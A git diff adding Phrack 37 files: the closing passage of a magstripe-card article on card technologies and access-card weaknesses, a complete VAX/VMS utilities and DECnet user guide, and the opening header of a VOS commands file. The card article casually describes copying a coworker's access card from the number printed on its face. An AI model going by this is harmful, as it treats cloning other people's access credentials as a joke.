+People wanted to store A LOT of data on plastic cards.  And they wanted that
+data to be 'invisible' to cardholders.  Here are the different card
+technologies that were invented and are available today.
+
+HOLLERITH - With this system, holes are punched in a plastic or paper card and
+            read optically.  One of the earliest technologies, it is now seen
+            as an encoded room key in hotels.  The technology is not secure,
+            but cards are cheap to make.
+
+BAR CODE -  The use of bar codes is limited.  They are cheap, but there is 
+            virtually no security and the bar code strip can be easily damaged.
+            
+INFRARED -  Not in widespread use, cards are factory encoded by creating a
+            "shadow pattern" within the card.  The card is passed thru a swipe
+            or insertion reader that uses an infrared scanner.  Infrared card
+            pricing is moderate to expensive, and encoding is pretty secure.
+            Infrared scanners are optical and therefore vulnerable to 
+            contamination.
+
+PROXIMITY - Hands-free operation is the primary selling point of this card.
+            Although several different circuit designs are used, all proximity
+            cards permit the transmission of a code simply by bringing the card
+            near the reader (6-12").  These cards are quite thick, up to 
+            0.15" (the ABA standard is 0.030"!).  
+
+WIEGAND -   Named after its inventor, this technology uses a series of small
+            diameter wires that, when subjected to a changing magnetic field,
+            induce a discrete voltage output in a sensing coil.  Two rows of
+            wires are embedded in a coded strip.  When the wires move past
+            the read head, a series of pulses is read and interpreted as binary
+            code.  This technology produces cards that are VERY hard to copy
+            or alter, and cards are moderately expensive to make.  Readers
+            based on this tech are epoxy filled, making them immune to weather
+            conditions, and neither card nor readers are affected by external
+            magnetic fields (don't worry about leaving these cards on top of
+            the television set...you can't hurt them!).  Here's an example of
+            the layout of the wires in a Wiegand strip:
+
+               ||| || ||   | ||| | || ||    |  ||  ||    |   |  ||  
+                  |  |    | |   | |     ||||     ||  ||||     ||
+
+            The wires are NOT visible from the outside of the card, but if
+            your card is white, place it in front of a VERY bright light source
+            and peer inside.  Notice that the spacings between the wires is
+            uniform.
+
+BARIUM FERRITE - The oldest magnetic encoding technology (been around for 40
+                 yrs!) it uses small bits of magnetized barium ferrite that are
+                 placed inside a plastic card.  The polarity and location of
+                 the "spots" determines the coding.  These cards have a short
+                 life cycle, and are used EXTENSIVELY in parking lots (high
+                 turnover rate, minimal security).  Barium Ferrite cards are
+                 ONLY used with INSERTION readers.
+
+There you have the most commonly used cards.  Magstripes are common because
+they are CHEAP and relatively secure.  
+
+
+                           ** Magstripe Coercivity **
+
+Magstripes themselves come in different flavors.  The COERCIVITY of the
+magnetic media must be specified.  The coercivity is the magnetic field
+strength required to demagnetize an encoded stripe, and therefore determines 
+the encode head field strength required to encode the stripe.  A range of media
+coercivities are available ranging from 300 Oersteds to 4,000 Oe.  That boils
+down to HIGH-ENERGY magstripes (4,000 Oe) and LOW-ENERGY magstripes (300 Oe).
+
+REMEMBER: since all magstripes have the same magnetic remanence regardless of
+their coercivity, readers CANNOT tell the difference between HIGH and LOW
+energy stripes.  Both are read the same by the same machines.
+
+LOW-ENERGY media is most common.  It is used on all financial cards, but its
+disadvantage is that it is subject to accidental demagnetization from contact
+with common magnets (refrigerator, TV magnetic fields, etc.).  But these cards
+are kept safe in wallets and purses most of the time.
+
+HIGH-ENERGY media is used for ID Badges and access control cards, which are
+commonly used in 'hostile' environments (worn on uniform, used in stockrooms).
+Normal magnets will not affect these cards, and low-energy encoders cannot
+write to them.
+
+
+                      ** Not All that Fluxes is Digital **
+
+Not all magstripe cards operate on a digital encoding method.  SOME cards
+encode AUDIO TONES, as opposed to digital data.  These cards are usually
+used with old, outdated, industrial-strength equipment where security is not an
+issue and not a great deal of data need be encoded on the card.  Some subway
+passes are like this.  They require only expiration data on the magstripe, and
+a short series of varying frequencies and durations are enough.  Frequencies
+will vary with the speed of swiping, but RELATIVE frequencies will remain the
+same (for instance, tone 1 is twice the freq. of tone 2, and .5 the freq of
+tone 3, regardless of the original frequencies!).  Grab an oscilloscope to
+visualize the tones, and listen to them on your stereo.  I haven't experimented
+with these types of cards at all.
+
+
+                         ** Security and Smartcards **
+
+Many security systems utilize magstripe cards, in the form of passcards and ID
+cards.  It's interesting, but I found in a NUMBER of cases that there was a
+serious FLAW in the security of the system.  In these cases, there was a code
+number PRINTED on the card.  When scanned, I found this number encoded on the
+magstripe.  Problem was, the CODE NUMBER was ALL I found on the magstripe!
+Meaning, by just looking at the face of the card, I immediately knew exactly
+what was encoded on it.  Ooops!  Makes it pretty damn easy to just glance at
+Joe's card during lunch, then go home and pop out my OWN copy of Joe's access
+card!  Fortunately, I found this flaw only in 'smaller' companies (sometimes
+even universities).  Bigger companies seem to know better, and DON'T print 
+ALL of the magstripe data right on card in big, easily legible numbers.  At
+least the big companies *I* checked. ;)
+
+Other security blunders include passcard magstripes encoded ONLY with the
+owner's social security number (yeah, real difficult to find out a person's
+SS#...GREAT idea), and having passcards with only 3 or 4 digit codes.
+
+Smartcard technology involves the use of chips embedded in plastic cards, with
+pinouts that temporarily contact the card reader equipment.  Obviously, a GREAT
+deal of data could be stored in this way, and unauthorized duplication would be
+very difficulty.  Interestingly enough, not much effort is being put into
+smartcards by the major credit card companies.  They feel that the tech is too
+expensive, and that still more data can be squeezed onto magstripe cards in the
+future (especially Track 1).  I find this somewhat analogous to the use of
+metallic oxide disk media.  Sure, it's not the greatest (compared to erasable-
+writable optical disks), but it's CHEAP..and we just keep improving it.
+Magstripes will be around for a long time to come.  The media will be refined,
+and data density increased.  But for conventional applications, the vast
+storage capabilities of smartcards are just not needed.
+
+
+                    ** Biometrics: Throw yer cards away! **
+
+I'd like to end with a mention of biometrics: the technology based on reading
+the physical attributes of an individual thru retina scanning, signature
+verification, voice verification, and other means.  This was once limited to
+government use and to supersensitive installations.  However, biometrics will
+soon acquire a larger market share in access control sales because much of its
+development stage has passed and costs will be within reach of more buyers.
+Eventually, we can expect biometrics to replace pretty much ALL cards..because
+all those plastic cards in your wallet are there JUST to help COMPANIES
+*identify* YOU.  And with biometrics, they'll know you without having to read
+cards.
+
+I'm not paranoid, nor do I subscribe to any grand "corporate conspiracy," but I
+find it a bit unsettling that our physical attributes will most likely someday
+be sitting in the cool, vast electronic databases of the CORPORATE world.
+Accessible by anyone willing to pay.  Imagine CBI and TRW databases with your
+retina image, fingerprint, and voice pattern online for instant, convenient
+retrieval.  Today, a person can CHOOSE NOT to own a credit card or a bank
+card...we can cut up our plastic ID cards!  Without a card, a card reader is
+useless and cannot identify you.
+
+Paying in cash makes you invisible!  However, with biometrics, all a machine
+has to do is watch... listen...and record.  With government/corporate America
+pushing all the buttons.  "Are you paying in cash?..Thank you...Please look
+into the camera.  Oh, I see your name is Mr. Smith...uh, oh...my computer tells
+me you haven't paid your gas bill...afraid I'm going to have to keep this money
+and credit your gas account with it....do you have any more cash?...or would
+you rather I garnish your paycheck?"  heh heh
+
+
+                       ** Closing Notes (FINALLY!!!!) **
+
+Whew...this was one MOTHER of a file.  I hope it was interesting, and I hope
+you distribute it to all you friends.  This file was a production of
+"Restricted Data Transmissions"...a group of techies based in the Boston area
+that feel that "Information is Power"...and we intend to release a number of
+highly technical yet entertaining files in the coming year....LOOK FOR THEM!!
+Tomorrow I'm on my way to Xmascon '91... we made some slick buttons
+commemorating the event...if you ever see one of them (green wreath.XMASCON
+1991 printed on it).hang on to it!... it's a collector's item.. (hahahah)
+Boy, I'm sleepy...
+
+Remember....    "Truth is cheap, but information costs!"
+
+But -=RDT is gonna change all that... ;)  set the info FREE!
+
+Peace.
+
+                           ..oooOO Count Zero OOooo..
+
+Usual greets to Magic Man, Brian Oblivion, Omega, White Knight, and anyone
+else I ever bummed a cigarette off.
+
+(1/18/92 addition: Greets to everyone I met at Xmascon..including but not
+excluding Crimson Death, Dispater, Sterling, Mack Hammer, Erik Bloodaxe,
+Holistic Hacker, Pain Hertz, Swamp Ratte, G.A.Ellsworth, Phaedrus, Moebius,
+Lord MacDuff, Judge Dredd, and of course hats off to *Drunkfux* for organizing
+and taking responsibility for the whole damn thing.  Hope to see all of you
+at SummerCon '92!  Look for Cyber-striper GIFs at a BBS near you..heh heh) 
+
+Comments, criticisms, and discussions about this file are welcome.  I can be
+reached at:
+                  count0@world.std.com
+                  count0@spica.bu.edu
+                  count0@atdt.org
+
+Magic Man and I are the sysops of the BBS "ATDT"...located somewhere in
+Massachusetts.  Great message bases, technical discussions...data made
+flesh...electronic underground.....our own Internet address (atdt.org)...
+field trips to the tunnels under MIT in Cambridge.....give it a call..
+mail me for more info.. ;)
diff --git a/phrack37/7.txt b/phrack37/7.txt
new file mode 100644
index 0000000..a9aec5a
--- /dev/null
+++ b/phrack37/7.txt
@@ -0,0 +1,587 @@
+      <:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>    >>>>>=-*  Users Guide to VAX/VMS  *-=<<<<<     <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>                   Part II of III                  <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>            Part C: Using the Utilities            <:=--=:>
+      <:=--=:>         Part D: Advanced Guide to VAX/VMS         <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>                    By Black Kat                   <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:><:=--=:><:=--=:><:=--=:>/|\<:=--=:><:=--=:><:=--=:><:=--=:>
+
+ Index
+ ~~~~~
+Part C contains information on the following topics:
+
+   o  Help Utility       o  Phone Utility
+   o  Backup Utility     o  Library Utility
+   o  Mail Utility       o  Sort Utility
+
+Part D contains information on the following topics:
+
+   o  Subprocesses               o  DECnet
+   o  Attaching to a Process     o  Proxy Access
+   o  Interrupting a Process     o  Task-to-Task Communication
+   o  Batch Processing           o  Remote Printing
+   o  Controlling Batch Jobs     o  VAXclusters
+
+                     <:=- Part C : Using the Utilities -=:>
+
+ Help Utility
+ ~~~~~~~~~~~~
+The VAX/VMS Help Utility is almost like having a DCL dictionary online.  It
+includes an explanation of each DCL command and can optionally explain valid
+command parameters.  Help also provides information about other VAX/VMS
+utilities and system services.
+
+There are two modes available for the help utility.  If you know the DCL
+command, utility or system service you want more information about, use direct
+mode.  If you don't know the command, use query mode.  Query mode can also be
+used to see which other commands and other subjects are referenced by the help
+utility.
+
+To use query mode, just type HELP <enter> at the DCL command level.  Help will
+display an alphabetical listing of all DCL commands and other topics for which
+information is available and you will be prompted with:  "Topic?"
+
+You can exit Help by pressing <enter> or <Ctrl-C> or <Ctrl-Z> or get
+information by typing in the command or subject name followed by <enter>.  When
+you request information on a command, Help will display details including how
+the command is invoked, what it does and the default values.  Most topics will
+have subtopics available which will be listed alphabetically followed by the
+prompt:  "COMMAND-NAME Subtopic?"
+
+You can select subtopic help or press <enter> to return to the "Topic?" prompt.
+If you want to see all the information available on a command, type in "HELP
+command_name ..." or "HELP command_name *".
+
+To use direct mode, enter HELP topic_name <enter>.  This will bypass the
+listing of available topic.  Additionally, you can enter a valid DCL command
+with or without qualifiers in this mode.  For example, to get information on
+the DCL SET command /TERMINAL qualifier, you could enter $ HELP SET TERMINAL.
+The help utility will provide information on the SET/TERMINAL command and
+prompt you for another subtopic since information on other qualifiers is
+available.
+
+For more information and details on the help utility, you can use:
+   $ HELP HINTS   or   $ HELP HELP/INSTRUCTIONS.
+
+
+ Backup Utility
+ ~~~~~~~~~~~~~~
+The backup utility is usually used by system managers to back up system disks,
+insuring a recent copy of data should the system disks become unreliable.
+Generally, the system disks are backed up to magnetic tape or removable disk
+packs, which are then removed and stored in a save location offline.  Users may
+use the backup utility on files in their own accounts to make copies for safe
+keeping, transferring to another system, or for offline storage.
+
+To use the backup utility, you have to decide what you want to back up, and how
+you want it done.  You have the following options:
+
+Selective   :  Files are backed up according to a specified criteria.
+               Qualifiers (e.g. /DATE) and file specifications (e.g. *.TXT)
+               are used for specifying these criteria.
+File by File:  Individual files or entire file directories are backed up.
+               Directories are created when copying, unlike the copy command.
+Incremental :  Saves file created since the most recent backup.  Usually
+               performed by system operators.
+Physical    :  An exact duplicate of a volume is saved.  All file structures
+               are ignored and the copy is a bit-by-bit duplicate.
+Image       :  A functionally equivalent copy of the original volume is
+               created.  Typically done on bootable volumes and system disks.
+
+
+To back up files to a subdirectory:  $ BACKUP F1.TXT,F2.TXT,*.DAT [BY.JUNK]
+
+To copy a directory tree:  $ BACKUP [dir...]file_spec [dir...]file_spec
+
+To copy disk volumes:  $ MOUNT/FOREIGN DJA1:
+                       $ BACKUP/IMAGE DUA2: DUA1:
+
+To copy to tape:       $ INITIALIXE MUA0: TAPE  (the first time its used)
+                       $ MOUNT/FOREIGH MUA0:
+                          MOUNT-I-MOUNTED, TAPE mounted on __MUA0:
+                       $ BACKUP [.DRV]MV_DYDRV.MAR MUA0:[]MV_DYDRV.MAR
+
+A save set is a single file containing multiple files that have been backed up.
+To make a save set:
+
+                       $ MOUNT/FOREIGN MUA0:
+                          MOUNT-I-MOUNTED, TAPE mounted on __MUA0:
+                       $ BACKUP DUB1:[BY.JUNK]*.*;* MUA0:08JUN.BAK/SAVE_SET
+
+A single file can be retrieved from a save set by using the /SELECT qualifier.
+For example, to restore the file LOGIN.COM from the previously backed up save
+set:
+
+                  $ MOUNT/FOREIGH MUA0:
+                     MOUNT-I-MOUNTED, TAPE mounted on __MUA0:
+                  $ BACKUP
+                 __From: MUA0:08:JUN.BAK/SAVE_SET/SELECT=[BY.JUNK]LOGIN.COM
+                 __To: *.*
+
+Listing a save set:  $ MOUNT/FOREIGN MUA0:
+                        MOUNT-I-MOUNTED, TAPE mounted on __MUA0:
+                     $ BACKUP/LIST MUA0:08JUN.BAK/SAVE_SET
+
+Selective backups:   $ BACKUP *.*/SINCE=12-APR-1988 MUA0:08JUN.BAK/SAVE_SET
+                     $ BACKUP
+                     __From: *.*/SINCE=12-APR-1988/EXCLUDE=[*.TMP,*.LOG]
+                     __To: MUA0:08JUN.BAK/SAVE_SET
+
+
+The following is a list of some other qualifiers you'll find useful.
+
+ Qualifier  Function
+ ~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+/LOG        Writes log message to terminal as each backup file is written.
+/VERIFY     Verifies the copy or save set with the original after copy.
+/CONFIRM    Display each filename and ask for confirmation before copy.
+/DELETE     Deletes source file after destination file written.
+
+
+ Mail Utility
+ ~~~~~~~~~~~~
+When you receive new mail, a message will be sent to your terminal unless the
+/NOBROATCAST qualifier has been specified with the SET TERMINAL command.  Mail
+is an interactive utility that understands many commands in a format identical
+to DCL commands.  The utility is invoked by typing "$ MAIL" at the DCL command
+level.  Mail has a built in help feature which works the same way as the
+VAX/VMS Help Utility.  Mail may be sent interactively or directly.
+
+Interactive implies the use of the mail utility in conversational mode by
+invoking mail at the DCL command level.  After invoking the mail utility, use
+the SEND command, and mail will prompt you for the name of the user(s) you want
+to send the mail to, your name, the subject, and the message text which you
+will terminate with <Ctrl-Z>.  When you press <Ctrl-Z> the message is sent and
+you are returned to the mail prompt where you can type EXIT to quit.
+
+To send mail in direct mode from the DCL command line, use the following
+format:  $ MAIL file_spec user /SUBJECT="character string" where "file_spec"
+is a valid VAX/VMS file specification containing the body of your mail message
+and "user" is the name of a user on your local system or remote node.  The
+/SUBJECT qualifier is optional.
+
+To send mail to multiple users (like a mailing list) create a file with a list
+of the account names of every user you want to receive the message.  Then enter
+@FILENAME at the "To:" prompt and each user listed in the distribution list
+will receive a copy of your mail.  A distribution list may also contain another
+distribution list by preceeding the second name with an at sign (@).  Comments
+are included by using an exclamation point (!).  The following is a sample
+distribution list:
+
+  ! VAX.DIS
+  !
+  ! Staff
+  JONES
+  OPER
+  BYNON
+  !
+  ! Accounting personnel
+  @ACTLIST
+
+To read your mail, just type MAIL <enter> and you will be told how many
+messages you have waiting.  Read is the default command, so you can just
+press <enter> to start reading them.  To reply to a message, use the REPLY or
+ANSWER commands and the mail utility will fill out the header information
+automatically.  You can store your mail in folders for later reference.  The
+system has three default folders (MAIL, NEWMAIL, and WASTEBASKET).
+
+MAIL is the default mail folder and always exists.  It is used to store mail
+messages after you've read them unless you file these messages in other folders
+you've created.
+
+The NEWMAIL folder stores mail messages before you read them, like a mailbox.
+They're automatically moved to the MAIL folder after you've read them unless
+you specify a different destination folder with the MOVE command.
+
+The WASTEBASKET folder is a temporary folder used to store messages that have
+been deleted.  These messages remain in the WASTEBASKET folder until you exit
+the mail utility, at which time they're thrown out permanently.
+
+To create new folders, select a message and enter the MOVE command.  If you
+attempt to move a message to a nonexistent folder, you'll be asked if you want
+to create a new folder.  For example:
+
+   MAIL> 11
+   MAIL> MOVE MEMOS
+   Folder MEMOS does not exist. Create it (Y/N, default is N)? Y
+   MAIL-NEWFOLDER, folder MEMOS created MAIL>
+
+The SELECT command allows you to move from one folder to another.  For example,
+if you type SELECT JUNK at the "MAIL>" prompt, you will be moved to the JUNK
+folder, and mail will respond with the number of messages contained in the new
+folder.
+
+The DELETE command accepts a message number as a parameter or deletes the
+current message if a message number is not supplied.  To delete a folder, just
+delete all the messages in that folder with the DELETE qualifier /ALL.
+
+To log a mail message to a file, use the EXTRACT qualifier.  If the /NOHEADER
+qualifier is used, the header information will not be included.  For example:
+EXTRACT/NOHEADER MEMO.TXT will save the currently selected message to a file
+named MEMO.TXT.
+
+For more information on the mail utility, use mail's HELP command.
+
+
+ Phone Utility
+ ~~~~~~~~~~~~~
+The VAX/VMS Phone Utility allows you to talk to other users on your system.  It
+simulates a real telephone with such features as call holding, conference calls
+and telephone directories.  The Phone utility only works with VT100, VT200 or
+compatible terminals.
+
+To call someone with the phone utility, enter "$ PHONE username" where username
+is the person you want to talk to.  Your screen will split horizontally in half
+and indicate that the phone utility is ringing the other person.  Your half of
+the conversation will be displayed on the top of the screen and the other
+person's will appear on the lower half.
+
+The phone utility may also be used interactively by entering "$ PHONE", and you
+will now be given the phone prompt (%).  You can enter commands directly now
+(e.g. "% DIRECTORY").  The phone utility has an online help facility just like
+the mail utility.
+
+
+ Library Utility
+ ~~~~~~~~~~~~~~~
+Sometimes its easier to maintain a single file instead of a group of related
+files.  The VAX/VMS Library Utility lets you create and maintain a specially
+formatted file called a library in which you can store groups of single files
+called modules.  Predefined libraries include text, help, object, sharable
+image and macro.  Many VAX/VMS utilities such as HELP and LINK are capable of
+processing library files.  Unless you're a programmer or system manager,
+you'll probably only use text and help libraries.
+
+To create a library use the LIBRARY command's /type qualifier and the /CREATE
+qualifier.  The /type qualifiers are:  /TEXT, /SHARE, /HELP, /OBJECT, /MACRO.
+For example to create a text library named BOOK.TLB:
+
+   $ LIBRARY/TEXT/CREATE BOOK.
+
+You may optionally specify a list of files to be included in a library when it
+is created.  For example:
+
+   $ LIBRARY/TEXT/CREATE BOOK TOC,C1,C2,INDEX
+
+To list the names of modules in a library, use the /LIST qualifier:
+
+   $ LIBRARY/TEXT/LIST BOOK
+   Directory of TEXT library BOOK.TLB;1 on 12-JUN-1989 14:12:07
+   TOC
+   C1
+   C2
+   INDEX
+
+You can also display a history of updates made to the library by using the
+/HISTORY qualifier with the /LIST qualifier.
+
+To add modules to an existing library, use the /INSERT qualifier:
+
+   $ LIBRARY/TEXT/INSERT BOOK CH3
+
+To update a module in a library, do the following:
+
+   o  Extract the module to be updated with the /EXTRACT qualifier.
+   o  Make the necessary changes.
+   o  Write over the old module with the /REPLACE qualifier.
+
+For example:  $ LIBRARY/TEXT/EXTRACT BOOK CH2
+              $ EDIT CHAP2.TXT
+                .
+                .    (edit the file)
+                .
+              $ LIBRARY/TEXT/REPLACE BOOK CH2
+
+
+ Sort Utility
+ ~~~~~~~~~~~~
+The VAX/VMS Sort Utility will reorganize records within a file.  The simplest
+form of the sort command will organize records in ascending alphabetical order.
+For example, to sort BOOK.TXT, you could issue the command:
+
+   $ SORT BOOK.TXT SORTED.TXT
+
+The Sort utility sorts on the first character of the field in each record in
+the input file.  If there is more than one field or column in a record, the
+entire record is ordered, not just the first field.
+
+Here's an example of sorting in descending order numerically with multiple
+fields.  The sample data file JUNK.TXT contains two fields of data. The first
+field contains a name, and the second field, starting in column 9 contains the
+two-digit number we're sorting by:
+
+   PAT     47
+   PAT     47
+   JIM     09
+   TOM     23
+   RICH    43
+   GARY    02
+   KURT    13
+   KEVIN   27
+
+Sort the file:  $ SORT/KEY=(POSITION=9,SIZE=2,DESCENDING) JUNK.TXT SORTED.TXT
+
+The sorted file (SORTED.TXT) will now look like this:
+
+   PAT     47
+   RICH    43
+   KEVIN   27
+   TOM     23
+   KURT    13
+   JIM     09
+   GARY    02
+
+
+                  <:=- Part D : Advanced Guide to VAX/VMS -=:>
+
+ Subprocesses
+ ~~~~~~~~~~~~
+A major benefit of the VAX/VMS operating system is its support of multi-
+processing.  This is not restricted to multiple users logged into different
+terminals however.  VAX/VMS users may create multiple processes known as
+subprocesses from within their main processes.
+
+The DCL SPAWN command is used to create a subprocess.  The SPAWN command will
+create a subprocess with the attributes (default directory, privileges, memory,
+etc.) of its parent process unless otherwise specified.  For example:
+
+   $ SPAWN
+   % DCL-S-SPAWNED, process BYNON_1 spawned
+   % DCL-S-ATTACHED, terminal now attached to process BYNON_1
+
+In this case, the parent process is put into hibernation, the subprocess is
+given control of the keyboard, and we are left at the DCL prompt.  You can now
+enter any DCL commands, utilities, or other programs.  To return to the parent
+process, just $ LOGOUT of the subprocess:
+
+   $ LOGOUT
+     Process BYNON_1 logged out at 12-JUL-1981 13:04:17.10
+   $ DCL-S-RETURNED, control returned to process BYNON
+
+The SPAWN qualifier /NOLOG can be used to suppress the informational messages
+generated when a subprocess is created or logged out.  DCL Commands, procedures
+and VAX/VMS images (utilities and programs) may be executed directly with SPAWN
+by entering the correct syntax for the command or procedure after the SPAWN
+command.  For example:  $ SPAWN/NOLOG MAIL
+
+If you have a task that can execute without user intervention (e.g. a program
+compiler), you can spawn a task to run as a background process to your current
+process.  For example: $ SPAWN/NOWAIT FORTRAN VAXBBS
+
+The SPAWN qualifier /NOWAIT spawns the task to run concurrently (parallel) to
+the parent process.  Both processes will share the terminal and any messages
+>from the background task will be displayed at the terminal.  To avoid possible
+conflicts, use the /OUTPUT qualifier:
+
+   $ SPAWN/NOWAIT/OUTPUT=COMPILE.LOG FORTRAN.VAXBBS
+
+When the job in the subprocess is complete it will terminate and be removed
+>from the system.
+
+
+ ATTACHing to a Process
+ ~~~~~~~~~~~~~~~~~~~~~~
+You can use the DCL ATTACH command to connect your keyboard to any process or
+subprocess you've created.  To exit from BYNON_1 back to BYNON with the ATTACH
+command, enter "$ ATTACH BYNON" and the subprocess hibernates while you are
+returned to the parent process.
+
+
+ Interrupting a Process
+ ~~~~~~~~~~~~~~~~~~~~~~
+You can interrupt a process at anytime to create a subprocess by pressing
+<Ctrl-Y> and then using the SPAWN command.  When you're done working with the
+subprocess and have returned to the interrupted process, type CONTINUE to start
+processing again where you left off.  Some VAX/VMS utilities, such as MAIL,
+support SPAWN intrinsically, so you can spawn a process within these utilities
+by entering the SPAWN command without pressing <Ctrl-Y> first.
+
+
+ Batch Processing
+ ~~~~~~~~~~~~~~~~
+The SUBMIT command was briefly discussed in Part II: Programming the VAX.  A
+batch job is one or more DCL command procedures that execute from a detached
+process with your privileges and quotas.  The controller of the process is the
+batch queue which accepts jobs via the SUBMIT command.  Batch jobs execute
+without user interaction, permitting you to use your terminal for interactive
+work while the system executes the batch job (command procedure).  Batch jobs
+are used to execute tasks that take a long time to run, use many system
+resources, or need to be scheduled to execute at a specific time.
+
+The SUBMIT command will enter a command procedure to the default batch queue
+(SYS$BATCH) if a specific queue is not provided.  A command procedure submitted
+for batch execution is given a job name which defaults to the command procedure
+name unless otherwise specified.  The entry number given to the job is used to
+control it (delete, rename, etc.)
+
+
+ Controlling Batch Jobs
+ ~~~~~~~~~~~~~~~~~~~~~~
+You can specify a name for a batch job with the /NAME qualifier:
+
+   $ SUBMIT BACKUP /NAME=DAILY_BACK
+
+You may also execute more than one command procedure by separating the
+procedure names with a comma:
+
+   $ SUMBIT SORT_DATA,REPORT /NAME=WEEKLY_REPORT
+
+To schedule a batch job to execute after a specific time:
+
+   $ SUMBIT CLEANUP /AFTER=11:40
+   Job CLEANUP (queue SYS$BATCH, entry 39) holding until 1-JUN-1989 11:40
+
+To hold a job in the queue to be released later:
+
+   $ SUMBIT REMINDER /HOLD
+   Job REMINDER (queue SYS$BATCH, entry 12) holding
+   $
+   $ SET QUEUE/ENTRY=32/RELEASE SYS$BATCH
+
+To submit a job to a different queue:  $ SUBMIT TESTJOB /QUEUE=SLOW
+
+To lower the priority (e.g. if it's CPU intensive):
+
+   $ SUBMIT CRUNCH /PRIORITY=2
+
+To pass parameters:  $ SUBMIT COMPILE / PARAMETERS=(WINDOWS,MISC,DISP_IO)
+
+To disable the automatic printing of the batch job's log (file instead):
+
+   $ SUBMIT GOJOB /NOPRINT /LOG_FILE=DUA2:[BYNON]
+
+This will create a file DUA2:[BYNON]GOJOB.LOG.  If the /NOPRINT qualifier is
+not specified, the log file will be printed and deleted.  To print and keep the
+log file, use the /KEEP qualifier with the /LOG_FILE qualifier.
+
+After you submit a procedure to a batch queue, you can monitor its status and
+job characteristics by using the SHOW QUEUE command.  This will display the
+name, entry number and status of all the jobs you have in queue.  The /ALL
+qualifier will display all jobs you have enough privilege to see, and the /FULL
+qualifier provides more information about jobs, such as operating
+characteristics and submission time.
+
+You can use the SET QUEUE/ENTRY command to modify a job's priority
+(/PRIORITY), name (/NAME), or status (/RELEASE or /AFTER).  For example:
+
+   $ SET QUEUE /ENTRY=217 /PRIORITY=2 SYS$BATCH
+
+Use the DELETE /ENTRY command to delete jobs:  $ DELETE /ENTRY=18 SYS$BATCH
+
+
+ Using DECnet
+ ~~~~~~~~~~~~
+DECnet uses the standard VAX/VMS file specifications for remote file access.
+In addition to a node specification, you may also include access control
+information (username and password) in quotes.  For example:
+
+    BURG"JONES MYPW"::DUA2:JUNK.TXT
+     |     |    |       |     |
+     |     |    |       |     +---- Filename.Extension
+     |     |    |       |
+     |     |    |       +---------- Device name
+     |     |    |
+     |     |    +------------------ Password
+     |     |
+     |     +----------------------- Username
+     |
+     +----------------------------- Node name
+
+Unless a specific DECnet account exists on the host node, or proxy exists, you
+must supply access control information to execute a command on a remote system.
+(e.g. $ TYPE BURG""JONES MYPW"::DUA2:JUNK.TXT)
+
+
+ Proxy Access
+ ~~~~~~~~~~~~
+Because including access control information in a command string is a security
+risk, Digital provides proxy access, which works by keeping a database of users
+and hosts who may gain access to the system via DECnet.  The format of the
+database is: SYSTEM::REMOTE_USERNAME LOCAL_USERNAME.
+
+
+ Task-to-Task Communication
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+This is a feature of DECnet which allows programs on one system to communicate
+with programs on another (e.g. the DCL TYPE command)  To execute a procedure on
+a remote system, use the TYPE command with the TASK=xxx parameter.  For
+example:
+
+   $ TYPE VAX1::"TASK=SHOW_USERS"
+
+To show the users on a remote system you would write a command procedure
+something like this:
+
+   $! Show_Users.Com
+   $!
+   $      IF FMODE() .EQS. "NETWORK" THEN GOTO NETWORK
+   $      SHOW USERS
+   $      EXIT
+   $  NETWORK:
+   $      DEFINE/USER_MODE SYS$OUTPUT SYS$NET
+   $      SHOW USERS
+   $      EXIT
+
+Since SYS$OUTPUT is redirected to SYS$NET, the output is redirected to your
+terminal over DECnet.  Task-to-Task communication can be simple (like
+Show_Users) or complicated (like programs passing data back and forth).
+
+
+ Remote Printing
+ ~~~~~~~~~~~~~~~
+If your DECnet network contains a LAN such as Ethernet, you'll probably have to
+share printers with other nodes on the network.  The easiest way to print a
+file is to copy it directly to the print device.  This works fine as long as
+the device is spooled and set up with world write privileges.  For example:  $
+COPY JUNK.TXT BURG::LCA0:  will copy the file JUNK.TXT to the device LCA0: on
+node BURG.
+
+Another way to print is to use the DCL PRINT/REMOTE command.  However, the file
+must be located on the remote system to use this, which is inconvenient if the
+file you're printing is on the local system.  You can still do it though:
+
+   $ COPY JUNK.TXT BURG::[BYNON]
+   $ PRINT /REMOTE BURG::[BYNON]JUNK.TXT
+      Job JUNK (queue SYS$PRINT, entry 512) started on LCA0
+   $ DELETE BURG::[BYNON]JUNK.TXT
+
+ VAXclusters
+ ~~~~~~~~~~~
+The main purpose of a VAXcluster is high processor ability, shared resources,
+and a single security and management area.  There are two basic type of
+VAXclusters, heterogeneous and homogeneous, but a mix of the two is possible.
+The main difference between these types is how they share resources,
+specifically the VAX/VMS OS environment.
+
+The VAX/VMS OS environment is identical on each cluster in a homogeneous
+VAXcluster.  This is done by using a common system disk for all the nodes.
+User accounts, system files, queues and storage devices are shared, and all of
+the computers behave the same way.
+
+In a heterogeneous VAXcluster, the environment on each system is different.
+Each VAX has its own system disk, user accounts and system files.  Queues and
+storage devices may or may not be shared.  Users can work in different
+operating environments, depending on the system they're using.
+
+Usually a VAXcluster is accessed by an Ethernet-based terminal server.  Using
+a terminal server, a user can establish a session with any VAXcluster member,
+and the connection is identical to that of a directly connected terminal.
+However, terminal sessions can support multiple simultaneous sessions to
+different nodes.  In the unlikely event that a VAXcluster is set up with
+directly connected terminals and you need to access a different system, you
+can DECnet via the SET HOST facility.  All VAXcluster systems support DECnet
+within the cluster.
+
+VAXcluster members (nodes) often share processing resources through the use
+of print and batch queues known as cluster-wide queues, which are used the
+same as a normal queue.  The only extra information you need is the queue
+name.  A list of all the queues in a cluster can be called up with the DCL
+SHOW QUEUE command.  If you submit a job to a cluster-wide queue, you must
+insure that the node on which it resides has access to the file you want to
+print or the command procedure you want processed.
+
diff --git a/phrack37/8.txt b/phrack37/8.txt
new file mode 100644
index 0000000..0ef60c7
--- /dev/null
+++ b/phrack37/8.txt
@@ -0,0 +1,240 @@
+                 Volume Four, Issue Thirty-Seven, File 8 of 14
+
+                        ##############################
+                        #*#     Basic Commands     #*#
+                        #*#      for the VOS       #*#
+                        #*#         System         #*#
+                        ##############################
+
